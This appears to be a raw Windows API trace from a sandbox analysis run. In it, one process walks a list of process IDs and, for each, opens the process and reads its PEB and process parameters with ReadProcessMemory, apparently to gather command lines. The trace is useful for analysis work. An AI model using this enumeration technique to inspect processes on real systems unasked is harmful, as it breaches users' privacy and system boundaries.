[0413.531] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.531] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.554] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x554) returned 0x24c
[0413.554] GetLastError () returned 0x0
[0413.554] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.554] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.555] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26e8, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.556] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.557] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.557] malloc (_Size=0x60) returned 0x2c0790
[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2740, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.558] free (_Block=0x2c0790)
[0413.558] CloseHandle (hObject=0x24c) returned 1
[0413.559] _ui64tow (_Value=0x6e8, _Buffer="1364", _Radix=10) returned="1768"
[0413.563] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1768") returned 4
[0413.565] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.565] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e8) returned 0x24c
[0413.590] GetLastError () returned 0x0
[0413.590] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1028d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1026de, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.592] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.593] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x101ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.593] malloc (_Size=0x5a) returned 0x2c0790
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x102730, lpBuffer=0x2c0790, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.594] free (_Block=0x2c0790)
[0413.594] CloseHandle (hObject=0x24c) returned 1
[0413.595] _ui64tow (_Value=0x888, _Buffer="1768", _Radix=10) returned="2184"
[0413.599] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2184") returned 4
[0413.600] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.600] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x888) returned 0x24c
[0413.622] GetLastError () returned 0x0
[0413.622] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352980, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352702, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.623] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.624] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.624] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] malloc (_Size=0x8a) returned 0x2e1a70
[0413.625] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352784, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] free (_Block=0x2e1a70)
[0413.626] CloseHandle (hObject=0x24c) returned 1
[0413.627] _ui64tow (_Value=0x644, _Buffer="2184", _Radix=10) returned="1604"
[0413.632] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1604") returned 4
[0413.633] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.633] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x24c
[0413.689] GetLastError () returned 0x0
[0413.689] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x92910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.690] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x926ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.691] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.692] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.692] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.692] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x91ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.700] malloc (_Size=0x6c) returned 0x2c1680
[0413.700] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x92752, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.700] free (_Block=0x2c1680)
[0413.701] CloseHandle (hObject=0x24c) returned 1
[0413.702] _ui64tow (_Value=0x360, _Buffer="1604", _Radix=10) returned="864"
[0413.706] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="864") returned 3
[0413.708] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.708] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x24c
[0413.733] GetLastError () returned 0x0
[0413.733] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x122910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1226f0, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.735] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.735] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x121ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] malloc (_Size=0x6c) returned 0x2c1680
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x122754, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] free (_Block=0x2c1680)
[0413.737] CloseHandle (hObject=0x24c) returned 1
[0413.738] _ui64tow (_Value=0x8a8, _Buffer="864", _Radix=10) returned="2216"
[0413.751] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2216") returned 4
[0413.752] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.752] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x24c
[0413.780] GetLastError () returned 0x0
[0413.780] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526ea, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.782] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.783] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] malloc (_Size=0x78) returned 0x2c1300
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25275a, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] free (_Block=0x2c1300)
[0413.785] CloseHandle (hObject=0x24c) returned 1
[0413.786] _ui64tow (_Value=0x8b4, _Buffer="2216", _Radix=10) returned="2228"
[0413.791] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2228") returned 4
[0413.792] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.792] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x24c
[0413.815] GetLastError () returned 0x0
[0413.816] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26ea, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.819] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.821] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] malloc (_Size=0x62) returned 0x2c0720
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2744, lpBuffer=0x2c0720, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] free (_Block=0x2c0720)
[0413.822] CloseHandle (hObject=0x24c) returned 1
[0413.823] _ui64tow (_Value=0x8ec, _Buffer="2228", _Radix=10) returned="2284"
[0413.828] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2284") returned 4
[0413.829] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.829] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.851] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x24c
[0413.851] GetLastError () returned 0x0
[0413.851] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.851] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.851] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.852] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.852] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26f6, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.853] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.854] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.854] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.854] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.855] malloc (_Size=0x78) returned 0x2c1300
[0413.855] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2766, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.855] free (_Block=0x2c1300)
[0413.855] CloseHandle (hObject=0x24c) returned 1
[0413.856] _ui64tow (_Value=0x918, _Buffer="2284", _Radix=10) returned="2328"
[0413.861] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2328") returned 4
